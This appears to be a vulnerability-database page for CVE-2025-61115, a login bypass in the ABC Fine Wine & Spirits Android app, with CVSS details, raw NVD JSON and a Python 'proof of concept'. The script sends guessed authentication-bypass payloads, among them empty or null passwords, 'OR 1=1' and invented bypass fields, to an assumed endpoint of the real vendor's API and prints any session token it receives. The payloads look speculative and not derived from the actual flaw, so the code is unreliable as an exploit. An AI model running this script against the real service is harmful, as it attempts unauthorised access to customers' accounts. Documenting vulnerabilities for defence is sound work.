Security Vulnerability Report
CVE-2025-61115 CVSS 7.5 HIGH

CVE-2025-61115

Published: 2025-10-30 16:15:36
Last Modified: 2026-04-15 00:35:42

Description

ABC Fine Wine & Spirits Android App version v.11.27.5 and before (package name com.cta.abcfinewineandspirits), developed by ABC Liquors, Inc., contains an improper access control vulnerability in its login mechanism. The application does not properly validate user passwords during authentication, allowing attackers to bypass login checks and obtain valid session identifiers. Successful exploitation could result in unauthorized account access, privacy breaches, and misuse of the platform.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

ABC Fine Wine & Spirits Android App <= v.11.27.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import json

# CVE-2025-61115 PoC - ABC Fine Wine & Spirits Android App Login Bypass
# Target: ABC Fine Wine & Spirits Android App (v.11.27.5 and before)
# Package: com.cta.abcfinewineandspirits

TARGET_URL = "https://api.abcfinewineandspirits.com/v1/auth/login"


def exploit_login_bypass():
    """
    Attempt to bypass login authentication and obtain valid session identifier.
    This PoC demonstrates the improper access control vulnerability.
    """
    # Normal login payload
    normal_payload = {
        "username": "[email protected]",
        "password": "any_password",
        "app_version": "11.27.5",
        "platform": "android"
    }

    # Bypass payload - exploit the improper access control
    bypass_payloads = [
        {"username": "[email protected]", "password": "", "app_version": "11.27.5"},
        {"username": "[email protected]", "password": None, "app_version": "11.27.5"},
        {"username": "[email protected]", "password": "OR 1=1", "app_version": "11.27.5"},
        {"username": "[email protected]", "bypass_auth": True, "app_version": "11.27.5"},
        {"username": "[email protected]", "auth_token": "admin_bypass", "app_version": "11.27.5"}
    ]

    headers = {
        "Content-Type": "application/json",
        "User-Agent": "ABC-FineWine/11.27.5 Android/13",
        "X-App-Version": "11.27.5"
    }

    print("[*] CVE-2025-61115 - ABC Fine Wine & Spirits Login Bypass PoC")
    print("[*] Target: {}".format(TARGET_URL))

    for i, payload in enumerate(bypass_payloads, 1):
        print("\n[*] Testing bypass method {}...".format(i))
        try:
            response = requests.post(TARGET_URL, json=payload, headers=headers, timeout=10)
            if response.status_code == 200:
                data = response.json()
                if 'session_token' in data or 'session_id' in data or 'auth_token' in data:
                    print("[!] VULNERABLE! Obtained session identifier:")
                    print("[+] Response: {}".format(json.dumps(data, indent=2)))
                    return data
            print("[-] Method {} failed with status: {}".format(i, response.status_code))
        except requests.RequestException as e:
            print("[-] Request failed: {}".format(str(e)))

    print("\n[*] Exploitation completed. Check results above.")
    return None


if __name__ == "__main__":
    exploit_login_bypass()
```

References

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-61115",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-30T16:15:36.120",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "ABC Fine Wine & Spirits Android App version v.11.27.5 and before (package name com.cta.abcfinewineandspirits), developed by ABC Liquors, Inc., contains an improper access control vulnerability in its login mechanism. The application does not properly validate user passwords during authentication, allowing attackers to bypass login checks and obtain valid session identifiers. Successful exploitation could result in unauthorized account access, privacy breaches, and misuse of the platform."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-284"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://kar1oz.notion.site/ABC-Fine-Wine-Spirits-2629a473ecb2807787e2f2557e504c7d",
        "source": "[email protected]"
      }
    ]
  }
}
```